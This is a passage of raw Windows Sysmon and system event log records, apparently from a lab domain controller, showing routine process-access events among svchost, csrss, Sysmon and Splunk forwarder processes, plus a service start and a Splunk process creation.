C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:49.204","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-00107C890500}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3761,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:49.204\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-023F-5F25-0000-00107C890500}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:49.204","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-023F-5F25-0000-00107C890500}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76847,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The UALSVC service entered the running state.","param1":"UALSVC","param2":"running","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3762,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:49.517\r\nProcessGuid: {A837DB8D-0241-5F25-0000-001029B30500}\r\nProcessId: 5028\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nFileVersion: 8.0.2\r\nDescription: Remote Performance monitor using WMI\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-wmi.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:49.517","ProcessGuid":"{A837DB8D-0241-5F25-0000-001029B30500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","FileVersion":"8.0.2","Description":"Remote Performance monitor using WMI","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-wmi.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3763,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:49.516\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0241-5F25-0000-001029B30500}\r\nTargetProcessId: 5028\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:49.516","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0241-5F25-0000-001029B30500}","TargetProcessId":"5028","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3764,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:49.516\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0241-5F25-0000-001029B30500}\r\nTargetProcessId: 5028\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:49.516","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0241-5F25-0000-001029B30500}","TargetProcessId":"5028","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3765,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:49.516\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:49.516","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3766,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:49.516\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:49.516","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3767,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:49.516\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:49.516","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3768,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:49.516\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 